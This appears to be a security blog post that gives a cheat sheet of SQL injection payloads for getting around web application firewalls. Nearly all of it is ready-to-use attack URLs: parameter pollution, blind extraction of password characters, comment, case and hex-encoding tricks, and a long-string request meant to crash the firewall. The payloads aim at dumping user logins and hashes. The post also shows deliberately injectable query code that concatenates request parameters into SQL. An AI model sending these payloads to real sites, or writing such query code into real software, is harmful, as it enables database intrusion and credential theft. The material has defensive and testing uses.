Logo

Armand.nz

Home / About / Linkedin / Github

SQL Injection Example

#websec #sql |

SQL Injection - Normalization Method

/?id=1/*union*/union/*select*/select+1,2,3/*

Using HTTP Parameter Pollution (HPP)

Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

This request is successfully performed using the HPP technique

 /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

ByPassing WAF: SQL Injection – HPF

Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

These requests may be successfully performed using HPF

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

Bypassing WAF: Blind SQL Injection

Using logical requests AND/OR

The following requests allow one to conduct a successful attack for many WAFs

/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

An example of signature bypass.

The following request gets to WAF signature

/?id=1+union+(select+1,2+from+users)

But sometimes, the signatures used can be bypassed

/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)

Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

Code :

http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter:

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced Keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

Some case SQL keyword was filtered out and replaced with whitespace. So we can use “%0b” to bypass.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

Crash Firewall via doing Buffer Over Flow.

Buffer Overflow / Firewall Crash: Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow.

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…

Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values.

Example - (which means “union select”):

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

Misc Exploitable Functions

Many firewalls try to offer more Protection by adding Prototype or Strange Functions, Which, of course, we can exploited!

Example: This firewall below replaces “*” (asterisks) with Whitespaces, and so this is what we can do:

# If the Firewall removes the “*”, the result will be: 15+union+select….
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
comments powered byDisqus

Copyright © Armand